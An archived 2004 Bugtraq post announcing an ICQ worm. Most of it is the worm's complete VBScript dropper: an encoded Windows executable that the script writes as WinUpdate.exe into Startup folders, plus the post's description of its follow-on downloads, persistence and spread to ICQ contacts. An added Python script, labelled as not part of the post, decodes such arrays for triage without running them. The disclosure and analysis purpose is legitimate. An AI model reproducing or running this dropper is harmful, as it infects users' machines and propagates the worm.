Date: Tue, 24 Feb 2004 17:55:16 +0200
From: "Rafel Ivgi, The-Insider" <theinsider@....net.il>
To: "bugtraq" <bugtraq@...urityfocus.com>
Subject: New ICQ WORM


The new ICQ WORM... spreading by 2 exploits on
http://www.jokeworld.biz/index.html
and uses ICQ to download a .chm file that uses the latest .chm exploit.
The .chm file is downloaded as an ICQ sound WAV file, to the ICQ sounds
directory.
The file iefucker.html from inside the .chm file is run.

iefucker.html
--------------------------CUT HERE------------------------------

<body><html>

<script language="vbs">



 jelmersArray=
array(77,90,144,0,3,0,0,0,4,0,0,0,255,255,0,0,184,0,0,0,0,0,0,0,64,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,0,0,0,14,31
,186,14,0,180,9,205,33,184,1,76,205,33,84,104,105,115,32,112,114,111,103,114
,97,109,32,99,97,110,110,111,116,32,98,101,32,114,117,110,32,105,110,32,68,7
9,83,32,109,111,100,101,46,13,13,10,36,0,0,0,0,0,0,0,105,164,7,157,45,197,10
5,206,45,197,105,206,45,197,105,206,71,217,107,206,60,197,105,206,45,197,105
,206,32,197,105,206,215,230,112,206,42,197,105,206,45,197,104,206,56,197,105
,206,215,225,116,206,44,197,105,206,215,225,84,206,44,197,105,206,82,105,99,
104,45,197,105,206,0,0,0,0,0,0,0,0,80,69,0,0,76,1,3,0,192,18,44,64,0,0,0,0,0
,0,0,0,224,0,15,1,11,1,7,0,0,6,0,0,0,8,0,0,0,0,0,0,192,18,0,0,0,16,0,0,0,32,
0,0,0,0,64,0,0,16,0,0,0,2,0,0,4,0,0,0,0,0,0,0,4,0,0,0,0,0,0,0,0,64,0,0,0,4,0
,0,0,0,0,0,2,0,0,0,0,0,16,0,0,16,0,0,0,0,16,0,0,16,0,0,0,0,0,0,16,0,0,0,0,0,
0,0,0,0,0,0,20,33,0,0,100,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,160,32,0,0,28,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,32,0,0,152,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,46,116,101,120,116,0,0,0,204,4,0,0,0,16,0
,0,0,6,0,0,0,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,32,0,0,96,46,114,100,97,116,97,0,
0,141,4,0,0,0,32,0,0,0,6,0,0,0,10,0,0,0,0,0,0,0,0,0,0,0,0,0,0,64,0,0,64,46,1
00,97,116,97,0,0,0,68,1,0,0,0,48,0,0,0,2,0,0,0,16,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,64,0,0,192,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,85,
139,236,184,16,21,0,0,232,131,2,0,0,139,69,16,83,86,87,141,80,1,51,219,138,8
,64,58,203,117,249,43,194,131,248,1,15,134,238,1,0,0,106,100,255,21,0,32,64,
0,255,117,16,255,21,4,32,64,0,104,0,1,0,0,141,133,240,251,255,255,80,83,255,
21,56,32,64,0,83,83,106,3,83,106,1,104,0,0,0,128,141,133,240,251,255,255,80,
255,21,60,32,64,0,139,61,16,32,64,0,106,2,83,106,255,80,137,69,16,255,215,13
9,53,20,32,64,0,83,141,69,244,80,106,1,141,69,255,80,255,117,16,255,214,128,
125,255,42,15,133,131,0,0,0,106,2,83,106,251,255,117,16,255,215,83,141,69,24
4,80,106,4,141,69,248,80,255,117,16,255,214,106,2,83,106,251,88,43,69,248,80
,255,117,16,255,215,51,192,83,185,0,4,0,0,141,189,240,234,255,255,243,171,14
1,69,244,80,255,117,248,141,133,240,234,255,255,80,255,117,16,255,214,139,12
5,248,51,246,59,251,118,19,141,132,53,240,234,255,255,128,201,255,42,8,70,59
,247,136,8,114,237,136,156,61,240,234,255,255,51,192,138,140,5,240,234,255,2
55,136,136,32,48,64,0,64,58,203,117,238,255,117,16,255,21,24,32,64,0,190,0,0
,128,0,104,232,3,0,0,255,21,0,32,64,0,83,83,83,83,104,248,32,64,0,255,21,132
,32,64,0,83,83,83,83,104,32,48,64,0,80,163,36,49,64,0,255,21,136,32,64,0,59,
195,163,32,49,64,0,116,200,104,0,1,0,0,141,133,240,254,255,255,80,104,224,32
,64,0,255,21,28,32,64,0,83,104,128,0,0,0,106,2,83,83,104,0,0,0,64,141,133,24
0,254,255,255,80,255,21,60,32,64,0,131,248,255,137,69,16,116,141,83,86,83,25
5,21,32,32,64,0,86,139,248,106,8,87,255,21,36,32,64,0,141,77,240,81,86,80,25
5,53,32,49,64,0,137,69,248,255,21,140,32,64,0,133,192,15,132,91,255,255,255,
83,141,69,240,80,255,117,240,255,117,248,255,117,16,255,21,40,32,64,0,255,11
7,16,255,21,24,32,64,0,83,141,133,240,254,255,255,80,255,21,44,32,64,0,255,5
3,36,49,64,0,139,53,144,32,64,0,255,214,255,53,32,49,64,0,255,214,87,255,21,
48,32,64,0,235,111,190,0,1,0,0,86,141,133,240,253,255,255,80,83,255,21,56,32
,64,0,139,61,28,32,64,0,86,141,133,240,252,255,255,80,104,204,32,64,0,255,21
5,86,141,133,240,250,255,255,80,104,196,32,64,0,255,215,83,141,133,240,252,2
55,255,80,141,133,240,253,255,255,80,255,21,52,32,64,0,83,141,133,240,250,25
5,255,80,141,133,240,253,255,255,80,141,133,240,252,255,255,80,104,188,32,64
,0,83,255,21,124,32,64,0,95,94,51,192,91,201,194,16,0,81,61,0,16,0,0,141,76,
36,8,114,20,129,233,0,16,0,0,45,0,16,0,0,133,1,61,0,16,0,0,115,236,43,200,13
9,196,133,1,139,225,139,8,139,64,4,80,195,204,85,139,236,106,255,104,8,33,64
,0,104,192,20,64,0,100,161,0,0,0,0,80,100,137,37,0,0,0,0,131,196,152,83,86,8
7,137,101,232,199,69,252,0,0,0,0,106,2,255,21,72,32,64,0,131,196,4,199,5,56,
49,64,0,255,255,255,255,199,5,60,49,64,0,255,255,255,255,255,21,76,32,64,0,1
39,13,52,49,64,0,137,8,255,21,80,32,64,0,139,21,48,49,64,0,137,16,161,84,32,
64,0,139,8,137,13,64,49,64,0,232,118,1,0,0,161,16,48,64,0,133,192,117,14,104
,160,20,64,0,255,21,88,32,64,0,131,196,4,232,42,1,0,0,104,12,48,64,0,104,8,4
8,64,0,232,17,1,0,0,131,196,8,139,21,44,49,64,0,137,85,148,141,69,148,80,139
,13,40,49,64,0,81,141,85,156,82,141,69,144,80,141,77,160,81,255,21,96,32,64,
0,131,196,20,104,4,48,64,0,104,0,48,64,0,232,214,0,0,0,131,196,8,139,21,100,
32,64,0,139,50,137,117,140,128,62,34,15,133,168,0,0,0,70,137,117,140,138,6,1
32,192,116,4,60,34,117,242,128,62,34,117,4,70,137,117,140,138,6,132,192,116,
10,60,32,119,6,70,137,117,140,235,240,199,69,208,0,0,0,0,141,69,164,80,255,2
1,8,32,64,0,246,69,208,1,116,10,139,69,212,37,255,255,0,0,235,5,184,10,0,0,0
,80,86,106,0,106,0,255,21,12,32,64,0,80,232,234,251,255,255,137,69,152,80,25
5,21,104,32,64,0,235,34,139,69,236,139,8,139,9,137,77,136,80,81,232,61,0,0,0
,131,196,8,195,139,101,232,139,85,136,82,255,21,112,32,64,0,131,196,4,199,69
,252,255,255,255,255,139,77,240,100,137,13,0,0,0,0,95,94,91,139,229,93,195,1
28,62,32,15,134,102,255,255,255,70,137,117,140,235,241,144,144,255,37,108,32
,64,0,255,37,92,32,64,0,204,204,204,204,104,0,0,3,0,104,0,0,1,0,232,55,0,0,0
,131,196,8,195,144,144,144,144,144,144,144,144,144,144,144,144,144,51,192,19
5,144,144,144,144,144,144,144,144,144,144,144,144,144,195,144,144,144,144,14
4,144,144,144,144,144,144,144,144,144,144,255,37,116,32,64,0,255,37,68,32,64
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,244,35,0,0,230,35,0,0,16,36,0,0,252,35,0,0,176,35,0,0,164,35,0,0,
150,35,0,0,122,35,0,0,108,35,0,0,96,35,0,0,84,35,0,0,74,35,0,0,60,35,0,0,48,
35,0,0,208,35,0,0,194,35,0,0,0,0,0,0,34,35,0,0,240,34,0,0,226,34,0,0,210,34,
0,0,194,34,0,0,174,34,0,0,162,34,0,0,146,34,0,0,136,34,0,0,128,34,0,0,114,34
,0,0,106,34,0,0,2,35,0,0,0,0,0,0,48,36,0,0,0,0,0,0,78,34,0,0,58,34,0,0,38,34
,0,0,16,34,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,192,18,44,64,0,0,0,0,2,0,0,0,
65,0,0,0,76,36,0,0,76,14,0,0,111,112,101,110,0,0,0,0,37,84,69,77,80,37,92,0,
37,84,69,77,80,37,92,97,108,115,100,102,107,106,46,101,120,101,0,0,37,116,10
1,109,112,37,92,97,112,116,103,101,116,117,112,100,46,101,120,101,0,0,0,0,77
,111,122,105,108,108,97,47,53,46,48,0,0,0,0,0,255,255,255,255,34,20,64,0,55,
20,64,0,252,33,0,0,0,0,0,0,0,0,0,0,94,34,0,0,132,32,0,0,188,33,0,0,0,0,0,0,0
,0,0,0,22,35,0,0,68,32,0,0,120,33,0,0,0,0,0,0,0,0,0,0,34,36,0,0,0,32,0,0,244
,33,0,0,0,0,0,0,0,0,0,0,64,36,0,0,124,32,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,244,35,0,0,230,35,0,0,16,36,0,0,252,35,0,0,176,35,0,0,164,35,0,0,15
0,35,0,0,122,35,0,0,108,35,0,0,96,35,0,0,84,35,0,0,74,35,0,0,60,35,0,0,48,35
,0,0,208,35,0,0,194,35,0,0,0,0,0,0,34,35,0,0,240,34,0,0,226,34,0,0,210,34,0,
0,194,34,0,0,174,34,0,0,162,34,0,0,146,34,0,0,136,34,0,0,128,34,0,0,114,34,0
,0,106,34,0,0,2,35,0,0,0,0,0,0,48,36,0,0,0,0,0,0,78,34,0,0,58,34,0,0,38,34,0
,0,16,34,0,0,0,0,0,0,105,0,73,110,116,101,114,110,101,116,67,108,111,115,101
,72,97,110,100,108,101,0,154,0,73,110,116,101,114,110,101,116,82,101,97,100,
70,105,108,101,0,0,147,0,73,110,116,101,114,110,101,116,79,112,101,110,85,11
4,108,65,0,0,146,0,73,110,116,101,114,110,101,116,79,112,101,110,65,0,87,73,
78,73,78,69,84,46,100,108,108,0,208,0,95,101,120,105,116,0,72,0,95,88,99,112
,116,70,105,108,116,101,114,0,70,2,101,120,105,116,0,0,141,0,95,97,99,109,10
0,108,110,0,88,0,95,95,103,101,116,109,97,105,110,97,114,103,115,0,12,1,95,1
05,110,105,116,116,101,114,109,0,130,0,95,95,115,101,116,117,115,101,114,109
,97,116,104,101,114,114,0,0,155,0,95,97,100,106,117,115,116,95,102,100,105,1
18,0,0,105,0,95,95,112,95,95,99,111,109,109,111,100,101,0,0,110,0,95,95,112,
95,95,102,109,111,100,101,0,0,128,0,95,95,115,101,116,95,97,112,112,95,116,1
21,112,101,0,0,199,0,95,101,120,99,101,112,116,95,104,97,110,100,108,101,114
,51,0,0,77,83,86,67,82,84,46,100,108,108,0,0,180,0,95,99,111,110,116,114,111
,108,102,112,0,0,58,0,67,111,112,121,70,105,108,101,65,0,243,1,72,101,97,112
,68,101,115,116,114,111,121,0,106,3,87,105,110,69,120,101,99,0,118,3,87,114,
105,116,101,70,105,108,101,0,239,1,72,101,97,112,65,108,108,111,99,0,241,1,7
2,101,97,112,67,114,101,97,116,101,0,0,174,0,69,120,112,97,110,100,69,110,11
8,105,114,111,110,109,101,110,116,83,116,114,105,110,103,115,65,0,44,0,67,10
8,111,115,101,72,97,110,100,108,101,0,144,2,82,101,97,100,70,105,108,101,0,0
,241,2,83,101,116,70,105,108,101,80,111,105,110,116,101,114,0,0,74,0,67,114,
101,97,116,101,70,105,108,101,65,0,101,1,71,101,116,77,111,100,117,108,101,7
0,105,108,101,78,97,109,101,65,0,0,120,0,68,101,108,101,116,101,70,105,108,1
01,65,0,41,3,83,108,101,101,112,0,103,1,71,101,116,77,111,100,117,108,101,72
,97,110,100,108,101,65,0,0,156,1,71,101,116,83,116,97,114,116,117,112,73,110
,102,111,65,0,75,69,82,78,69,76,51,50,46,100,108,108,0,0,152,0,83,104,101,10
8,108,69,120,101,99,117,116,101,65,0,83,72,69,76,76,51,50,46,100,108,108,0,8
2,83,68,83,236,197,157,118,3,138,225,70,150,140,250,174,110,228,243,252,5,0,
0,0,103,58,92,33,87,111,114,107,92,95,95,67,117,114,114,101,110,116,92,95,10
0,95,101,92,82,101,108,101,97,115,101,92,95,100,95,101,46,112,100,98,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,151,139,139,143,197,208,208,136,136,136,209,138,140,139,141,158
,155,150,145,152,209,150,145,153,144,208,138,143,155,158,139,154,141,209,154
,135,154,37,0,0,0,42)


win2k="C:\Documents and Settings\All Users\Start
Menu\Programs\Startup\WinUpdate.exe"
win2ok="C:\Documents and Settings\All Users\Start
Menu\Programs\Startup\WinUpdate.exe"
winxp="C:\Documents and Settings\All Users\Start
Menu\Programs\Startup\WinUpdate.exe"
winxpee="C:\Documents and Settings\All Users\Start
Menu\Programs\Startup\WinUpdate.exe"
win98="c:\windows\Start Menu\Programs\Startup\WinUpdate.exe"
win98ate="c:\windows\Start Menu\Programs\Startup\WinUpdate.exe"

Function toString(payloadArray)
For Each arrayElement In payloadArray
toString = toString & ChrB(arrayElement)
Next
End Function
Const adTypeBinary = 1
Const adTypeText = 2
Const adSaveCreateOverWrite = 2

set jelmer = CreateObject("Adodb.Stream")
jelmer.Type = adTypeText
jelmer.Open
jelmer.WriteText toString(jelmersArray)
jelmer.Position = 0
jelmer.Type = adTypeBinary
jelmer.Position = 2
bytearray = jelmer.Read
jelmer.Close

set malware = CreateObject("Adodb.Stream")
malware.Type = adTypeBinary
malware.Open
malware.Write bytearray
On Error Resume Next
malware.savetofile(win2k), adSaveCreateOverWrite
On Error Resume Next
malware.savetofile(win2ok), adSaveCreateOverWrite
On Error Resume Next
malware.savetofile(winxp), adSaveCreateOverWrite
On Error Resume Next
malware.savetofile(winxpee), adSaveCreateOverWrite
On Error Resume Next
malware.savetofile(win98), adSaveCreateOverWrite
On Error Resume Next
malware.savetofile(win9ate), adSaveCreateOverWrite
On Error Resume Next
malware.Close

</script>

</body></html>
--------------------------CUT HERE------------------------------

and then it writes
c:\documents and settings\all users\start menu\startup\winupdate.exe
c:\windows\start menu\startup\winupdate.exe
c:\windows\all users\start menu\startup\winupdate.exe

The next time the computer starts it will be loaded and will download
another virus to these locations:

c:\documents and settings\<your user name>\local settings\temp\alsdfkj.exe
c:\documents and settings\<your user name>\local settings\temp\aptgetupd.exe

These files will create a "sysmon" folder inside the windows\system32
directory.

And this file
c:\windows\system32\sysmon\sysmon.exe
runs in the background and closes regedit if you want to prevent it from
autorunning.

The worm uses ICQ to spread, sending the following message to the whole contact
list:
http://www.jokeworld.biz :) LOL

* This worm possibly opens a shell; hacking was reported on an infected
machine.
   This worm is raging in Israel these days.

Panda info team was notified.
Rafel Ivgi, The-Insider.
Thanks a lot to "the pull".
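Added defensive example, not part of the post above and not the worm's own code: a small Python triage script for VBScript byte-array droppers of the kind quoted in this message. It parses the array(...) literal back into bytes (rejoining numbers that mail wrapping split across lines, as happened in the post, where e.g. "68,7" / "9,83" is really 68,79,83), checks whether the result carries an MZ header whose e_lfanew points at a PE signature, and lists printable strings so an analyst can spot drop paths, user agents and import names without ever writing or running the payload. The array it parses is constructed here (a PE skeleton with a handful of strings of the kind the decoded payload contains); the function and variable names are this example's own.

```python
import re
import struct


def build_sample_payload() -> bytes:
    """Constructed sample, not the worm's binary: an MZ/PE skeleton carrying a few
    strings of the kind the decoded dropper contains. Only the two signatures are
    laid out correctly; it is not a loadable executable."""
    e_lfanew = 0x40
    header = bytearray(b"MZ" + b"\0" * (0x3C - 2))   # DOS header, zero-filled
    header += struct.pack("<I", e_lfanew)             # e_lfanew lives at offset 0x3C
    header += b"PE\0\0" + b"\0" * 20                  # PE signature + blank file header
    tail = b"\0".join([
        b"%TEMP%\\alsdfkj.exe",
        b"%temp%\\aptgetupd.exe",
        b"Mozilla/5.0",
        b"InternetOpenUrlA",
        b"WININET.dll",
    ]) + b"\0"
    return bytes(header) + tail


def render_as_vbs(payload: bytes, width: int = 70) -> str:
    """Emit the payload as a VBScript array(...) literal, hard-wrapped every `width`
    characters so that, as in the mailed sample, some numbers are split across lines."""
    body = ",".join(str(b) for b in payload)
    wrapped = "\n".join(body[i:i + width] for i in range(0, len(body), width))
    return '<script language="vbs">\n jelmersArray=\narray(' + wrapped + ')\n</script>'


def parse_vbs_byte_array(source: str) -> bytes:
    """Return the first integer array(...) literal in `source` as bytes.
    All whitespace is removed before tokenising, so numbers broken across line ends
    are re-joined instead of being read as two smaller values."""
    m = re.search(r"array\s*\((.*?)\)", source, re.IGNORECASE | re.DOTALL)
    if not m:
        raise ValueError("no array(...) literal found")
    tokens = re.sub(r"\s+", "", m.group(1)).split(",")
    values = [int(t) for t in tokens if t]
    if any(not 0 <= v <= 255 for v in values):
        raise ValueError("array element outside 0..255")
    return bytes(values)


def is_pe(data: bytes) -> bool:
    """True if data starts with an MZ header whose e_lfanew points at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def printable_strings(data: bytes, min_len: int = 6) -> list:
    """ASCII runs of at least min_len characters, as `strings` would report them."""
    return [s.decode("ascii") for s in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)]


# Patterns worth a second look in a dropper: temp-dir paths, Startup-folder paths,
# executable names and URLs. Extend as needed; this is a triage heuristic only.
INDICATOR_RE = re.compile(r"(?i)%temp%|\\startup\\|\.exe$|https?://")


def triage(source: str) -> dict:
    """Decode a byte-array dropper and summarise what the payload looks like."""
    payload = parse_vbs_byte_array(source)
    strings = printable_strings(payload)
    return {
        "size": len(payload),
        "is_pe": is_pe(payload),
        "strings": strings,
        "indicators": [s for s in strings if INDICATOR_RE.search(s)],
    }


if __name__ == "__main__":
    report = triage(render_as_vbs(build_sample_payload()))
    print(f"payload: {report['size']} bytes, PE header: {report['is_pe']}")
    for s in report["indicators"]:
        print("indicator:", s)
```

To use it on a real sample, read the saved .html/.vbs text and pass it to triage(); the payload stays in memory and is never written to disk. Stripping all whitespace before splitting on commas is the important detail: a naive line-by-line parse of a mail-wrapped sample silently produces a byte string of the wrong length with every split number decoded as two values.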


